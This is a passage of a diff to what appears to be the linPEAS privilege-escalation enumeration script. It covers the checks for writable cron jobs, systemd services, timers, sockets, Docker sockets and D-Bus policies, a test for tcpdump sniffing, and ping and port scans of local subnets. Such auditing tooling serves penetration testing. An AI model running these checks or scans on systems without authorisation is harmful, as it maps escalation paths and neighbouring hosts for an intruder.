[ "$SUPERFAST" ]; then +print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" +temp_file=$(mktemp) +if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi +echo "" +fi + +#-- PCS) Cron +print_2title "Cron jobs" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" +command -v crontab 2>/dev/null || echo_not_found "crontab" +crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +command -v incrontab 2>/dev/null || echo_not_found "incrontab" +incrontab -l 2>/dev/null +ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" +cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." 
| sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +crontab -l -u "$USER" 2>/dev/null | tr -d "\r" +ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths +atq 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then +print_2title "Third party LaunchAgents & LaunchDemons" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" +ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null +echo "" + +print_2title "Writable System LaunchAgents & LaunchDemons" +find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! 
[ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi +done +echo "" + +print_2title "StartupItems" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" +ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null +echo "" + +print_2title "Login Items" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" +osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null +echo "" + +print_2title "SPStartupItemDataType" +system_profiler SPStartupItemDataType +echo "" + +print_2title "Emond scripts" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" +ls -l /private/var/db/emondClients +echo "" +fi + +#-- PCS) Services +print_2title "Services" +print_info "Search for outdated versions" +(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" +echo "" + +#-- PSC) systemd PATH +print_2title "Systemd PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" +systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" +WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") +echo "" + +#-- PSC) .service files +#TODO: .service files in MACOS are folders +print_2title "Analyzing .service files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" +printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do +if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if ! 
[ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi + servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths + printf "%s\n" "$servicebinpaths\n" | while read sp; do + if [ -w "$sp" ]; then + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" fi - timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) - printf "%s\n" "$timerbinpaths" | while read tb; do - if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" - fi done - #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" - #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" + relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + if [ "$relpath1" ] || [ "$relpath2" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + else + echo "$s is executing some relative path" + fi + fi +fi +done +if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi +echo "" + +#-- PSC) Timers +print_2title "System timers" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found +echo "" + +#-- PSC) .timer files +print_2title "Analyzing .timer files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do +if ! 
[ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" +fi +timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) +printf "%s\n" "$timerbinpaths" | while read tb; do + if [ -w "$tb" ]; then + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + fi +done +#relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" +#for rp in "$relpath"; do +# echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" +#done +done +echo "" + +#-- PSC) .socket files +#TODO: .socket files in MACOS are folders +if ! [ "$IAMROOT" ]; then +print_2title "Analyzing .socket files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + fi + socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketsbinpaths" | while read sb; do + if [ -w "$sb" ]; then + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" + fi + done + socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketslistpaths" | while read sl; do + if [ -w "$sl" ]; then + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; + fi + done +done +if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +if ! 
[ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +echo "" + +print_2title "Unix Sockets Listening" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +# Search sockets using netstat and ss +unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") +fi +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) +fi + +# But also search socket files +unix_scks_list2=$(find / -type s 2>/dev/null) + +# Detele repeated dockets and check permissions +(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + perms="" + if [ -r "$l" ]; then + perms="Read " + fi + if [ -w "$l" ];then + perms="${perms}Write" + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; + else + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then + owner=$(ls -l "$s" | cut -d ' ' -f 3) + echo "Socket $s owned by $owner uses HTTP. 
Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" | head -n 30 + fi + fi +done +echo "" +fi + +#-- PSC) Writable and weak policies in D-Bus config files +print_2title "D-Bus config files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +if [ "$PSTORAGE_DBUS" ]; then +printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + for f in $d/*; do + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" + fi + + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi #done - done - echo "" + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #-- 
PSC) .socket files - #TODO: .socket files in MACOS are folders - if ! [ "$IAMROOT" ]; then - print_2title "Analyzing .socket files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" - fi - socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketsbinpaths" | while read sb; do - if [ -w "$sb" ]; then - echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" - fi - done - socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketslistpaths" | while read sl; do - if [ -w "$sl" ]; then - echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; - fi - done + #TODO: identify allows in context="default" done - if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +done +fi +echo "" + +print_2title "D-Bus Service Objects list" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +dbuslist=$(busctl list 2>/dev/null) +if [ "$dbuslist" ]; then +busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! 
echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," fi - if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" fi - echo "" +done +else echo_not_found "busctl" +fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi - print_2title "Unix Sockets Listening" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - # Search sockets using netstat and ss - unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") - fi - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) - fi - - # But also search socket files - unix_scks_list2=$(find / -type s 2>/dev/null) +if echo $CHECKS | grep -q network_information; +print_title "Network Information" +########################################### +#---------) Network Information (---------# +########################################### - # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do - perms="" - if [ -r "$l" ]; then - perms="Read " - fi - if [ -w "$l" ];then - perms="${perms}Write" - fi - if ! 
[ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; - else - echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" - # Try to contact the socket - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then - owner=$(ls -l "$s" | cut -d ' ' -f 3) - echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "$socketcurl" | head -n 30 - fi - fi - done - echo "" - fi - - #-- PSC) Writable and weak policies in D-Bus config files - print_2title "D-Bus config files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - if [ "$PSTORAGE_DBUS" ]; then - printf "%s\n" "$PSTORAGE_DBUS" | while read d; do - for f in $d/*; do - if ! 
[ "$IAMROOT" ] && [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi - - genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - - #TODO: identify allows in context="default" - done - done - fi +if [ "$MACOS" ]; then + print_2title "Network Capabilities" + warn_exec system_profiler SPNetworkDataType echo "" - - print_2title "D-Bus Service Objects list" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - dbuslist=$(busctl list 2>/dev/null) - if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; - if ! 
echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," - fi - fi - done - else echo_not_found "busctl" - fi - echo "" - echo "" - - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- NI) Hostname, hosts and DNS +print_2title "Hostname, hosts and DNS" +cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null +warn_exec dnsdomainname 2>/dev/null +echo "" -if echo $CHECKS | grep -q Net; then - ########################################### - #---------) Network Information (---------# - ########################################### - print_title "Network Information" +#-- NI) /etc/inetd.conf +print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" +(cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" +echo "" - if [ "$MACOS" ]; then - print_2title "Network Capabilities" - warn_exec system_profiler SPNetworkDataType - echo "" - fi +#-- NI) Interfaces +print_2title "Interfaces" +cat /etc/networks 2>/dev/null +(ifconfig || ip a) 2>/dev/null +echo "" - #-- NI) Hostname, hosts and DNS - print_2title "Hostname, hosts and DNS" - cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - warn_exec dnsdomainname 2>/dev/null +#-- NI) Neighbours +print_2title "Networks and neighbours" +if [ "$MACOS" ]; then + netstat -rn 2>/dev/null +else + (route || ip n || cat /proc/net/route) 2>/dev/null +fi +(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Firewall status" + warn_exec system_profiler SPFirewallDataType +fi + +#-- NI) Iptables +print_2title "Iptables rules" +(timeout 1 iptables -L 
2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" +echo "" + +#-- NI) Ports +print_2title "Active Ports" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +echo "" + +#-- NI) MacOS hardware ports +if [ "$MACPEAS" ]; then + print_2title "Hardware Ports" + networksetup -listallhardwareports echo "" - #-- NI) /etc/inetd.conf - print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" - (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" + print_2title "VLANs" + networksetup -listVLANs echo "" - #-- NI) Interfaces - print_2title "Interfaces" - cat /etc/networks 2>/dev/null - (ifconfig || ip a) 2>/dev/null + print_2title "Wifi Info" + networksetup -getinfo Wi-Fi echo "" - #-- NI) Neighbours - print_2title "Networks and neighbours" - if [ "$MACOS" ]; then - netstat -rn 2>/dev/null + print_2title "Check Enabled Proxies" + scutil --proxy + echo "" + + print_2title "Wifi Proxy URL" + networksetup -getautoproxyurl Wi-Fi + echo "" + + print_2title "Wifi Web Proxy" + networksetup -getwebproxy Wi-Fi + echo "" + + print_2title "Wifi FTP Proxy" + networksetup -getftpproxy Wi-Fi + echo "" +fi + +#-- NI) tcpdump +print_2title "Can I sniff with tcpdump?" +timeout 1 tcpdump >/dev/null 2>&1 +if [ $? -eq 124 ]; then #If 124, then timed out == It worked + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- NI) Internet access +if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then + print_2title "Internet Access?" 
+ check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & + wait + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then + if ! [ "$FOUND_NC" ]; then + printf $RED"[-] $SCAN_BAN_BAD\n$NC" + echo "The network is not going to be scanned..." + else - (route || ip n || cat /proc/net/route) 2>/dev/null - fi - (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null - echo "" + print_2title "Scanning local networks (using /24)" - if [ "$MACPEAS" ]; then - print_2title "Firewall status" - warn_exec system_profiler SPFirewallDataType - fi + if ! [ "$PING" ] && ![ "$FPING" ]; then + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" + fi - #-- NI) Iptables - print_2title "Iptables rules" - (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" - echo "" - - #-- NI) Ports - print_2title "Active Ports" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" - ( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," - echo "" - - #-- NI) MacOS hardware ports - if [ "$MACPEAS" ]; then - print_2title "Hardware Ports" - networksetup -listallhardwareports - echo "" - - print_2title "VLANs" - networksetup -listVLANs - echo "" - - print_2title "Wifi Info" - networksetup -getinfo Wi-Fi - echo "" - - print_2title "Check Enabled Proxies" - scutil --proxy - echo "" - - print_2title "Wifi Proxy URL" - networksetup -getautoproxyurl Wi-Fi - echo "" - - print_2title "Wifi Web Proxy" - networksetup -getwebproxy Wi-Fi - echo "" - - print_2title "Wifi FTP Proxy" - networksetup -getftpproxy Wi-Fi - echo "" - fi - - #-- NI) tcpdump - print_2title "Can I sniff with tcpdump?" - timeout 1 tcpdump >/dev/null 2>&1 - if [ $? 
-eq 124 ]; then #If 124, then timed out == It worked - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - - #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - print_2title "Internet Access?" - check_tcp_80 2>/dev/null & - check_tcp_443 2>/dev/null & - check_icmp 2>/dev/null & - check_dns 2>/dev/null & - wait - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then - if ! [ "$FOUND_NC" ]; then - printf $RED"[-] $SCAN_BAN_BAD\n$NC" - echo "The network is not going to be scanned..." - - else - print_2title "Scanning local networks (using /24)" - - if ! [ "$PING" ] && ![ "$FPING" ]; then - printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" - fi - - select_nc - local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") - printf "%s\n" "$local_ips" | while read local_ip; do - if ! [ -z "$local_ip" ]; then - print_3title "Discovering hosts in $local_ip/24" - - if [ "$PING" ] || [ "$FPING" ]; then - discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + select_nc + local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") + printf "%s\n" "$local_ips" | while read local_ip; do + if ! 
[ -z "$local_ip" ]; then + print_3title "Discovering hosts in $local_ip/24" + + if [ "$PING" ] || [ "$FPING" ]; then + discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + fi + + discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp + + sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips + rm $Wfolder/.ips.tmp 2>/dev/null + + while read disc_ip; do + me="" + if [ "$disc_ip" = "$local_ip" ]; then + me=" (local)" fi - discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp - - sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips - rm $Wfolder/.ips.tmp 2>/dev/null - - while read disc_ip; do - me="" - if [ "$disc_ip" = 